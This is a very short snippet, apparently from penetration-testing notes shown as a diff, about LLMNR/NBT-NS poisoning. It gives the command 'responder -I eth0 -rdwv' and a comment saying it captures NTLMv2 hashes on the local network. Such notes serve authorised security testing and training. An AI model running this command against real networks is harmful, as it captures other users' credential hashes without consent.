 Responder — LLMNR/NBT-NS Poisoning

-# Start Responder on interface
+# Start Responder to capture NTLMv2 hashes on the local network

 responder -I eth0 -rdwv